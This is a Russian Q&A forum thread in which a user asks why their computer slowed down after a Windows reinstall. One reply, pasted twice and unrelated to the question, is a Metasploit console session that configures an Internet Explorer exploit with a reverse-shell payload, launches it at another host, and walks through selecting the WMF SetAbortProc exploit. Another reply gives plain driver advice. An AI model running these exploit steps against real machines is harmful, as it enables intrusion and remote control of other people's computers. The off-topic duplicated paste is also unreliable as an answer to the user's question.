Прочее компьютерное
почему после переустановки винды начал тормозить комп объясните человеческим языком
что объяснить?
Ну зачит ОС туповатую установил.
>> show exploits
Exploits
========
Name Description
-------пропущено -----------
windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
windows/browser/ie_createobject Internet Explorer COM CreateObject Code Execution
windows/browser/ie_iscomponentinstalled Internet Explorer isComponentInstalled Overflow
msf > use windows/browser/ms03_020_ie_objecttype
msf exploit(ms03_020_ie_objecttype) > set SRVHOST 10.10.12.206
SRVHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms03_020_ie_objecttype) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(ms03_020_ie_objecttype) > set LHOST 10.10.12.206
LHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > exploit[*] Started reverse handler[*] Using URL: http://10.10.12.206:8080/xPB3Ch32qOgpE6s[*] Server started.[*] Sending exploit to 10.10.12.208:1200...
----пропущено -----
4. Выбираем WMF-сплоит.. .
use windows/browser/ms06_001_wmf_setabortproc
5. Смотрим инфу по нём:
info windows/browser/ms06_001_wmf_setabortproc
Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
Version: 4647
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
hdm <hdm@metasploit.com>
san <san@xfocus.org>
O600KO78RUS <o600ko78rus@unknown.ru>
Available targets:
Id Name
-- ----
0 Windows XP/2003/Vista Automatic
Basic options:
Name Current Setting Required Description
--------------------------------------
SRVHOST 10.0.3.84 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1220
Avoid: 1 characters
Description:
This module exploits a vulnerability in the GDI library included
with Windows XP and 2003. This vulnerability uses the 'Escape'
metafile function to execute arbitrary code through the SetAbortProc
procedure. This module generates a random WMF record stream for each
request.
тут то все просто
Exploits
========
Name Description
-------пропущено -----------
windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
windows/browser/ie_createobject Internet Explorer COM CreateObject Code Execution
windows/browser/ie_iscomponentinstalled Internet Explorer isComponentInstalled Overflow
msf > use windows/browser/ms03_020_ie_objecttype
msf exploit(ms03_020_ie_objecttype) > set SRVHOST 10.10.12.206
SRVHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms03_020_ie_objecttype) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(ms03_020_ie_objecttype) > set LHOST 10.10.12.206
LHOST => 10.10.12.206
msf exploit(ms03_020_ie_objecttype) > exploit[*] Started reverse handler[*] Using URL: http://10.10.12.206:8080/xPB3Ch32qOgpE6s[*] Server started.[*] Sending exploit to 10.10.12.208:1200...
----пропущено -----
4. Выбираем WMF-сплоит.. .
use windows/browser/ms06_001_wmf_setabortproc
5. Смотрим инфу по нём:
info windows/browser/ms06_001_wmf_setabortproc
Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
Version: 4647
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
hdm <hdm@metasploit.com>
san <san@xfocus.org>
O600KO78RUS <o600ko78rus@unknown.ru>
Available targets:
Id Name
-- ----
0 Windows XP/2003/Vista Automatic
Basic options:
Name Current Setting Required Description
--------------------------------------
SRVHOST 10.0.3.84 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1220
Avoid: 1 characters
Description:
This module exploits a vulnerability in the GDI library included
with Windows XP and 2003. This vulnerability uses the 'Escape'
metafile function to execute arbitrary code through the SetAbortProc
procedure. This module generates a random WMF record stream for each
request.
тут то все просто
установи драйвера (дрова) непосредственно для твоего железа МП, видео карта звуковая карта и. т. д
Что бы получить нормальный ответ надо поработать ручками и дать больше информации.
Похожие вопросы
- Бывает ли такие вирусы которые даже после переустановки Винды остаются в компе?))))))
- Что делать если после переустановки виндовс,начал лагать комп
- Почему уже в самом начале работы компа большая нагрузка на оперативку? (см. картинку и пояснение).
- Со временем комп теряет начинает тормозить. Переустановка винды решает проблему, без переустановки винды можно обойтись?
- Объясните мне насцали в уши или нет, отнесла комп на переустановку винды
- Почему сообщение выводится "сетевой кабель не подключен"? это после переустановки винды на компе, который был в лок.сети
- Почему у меня тормозит комп?
- 2 винды на одном компе (Нужна помощь с переустановкой)
- помогите, комп заражен вирусом one half 3666 поможет ли простая переустановка винды?
- Переустановка винды.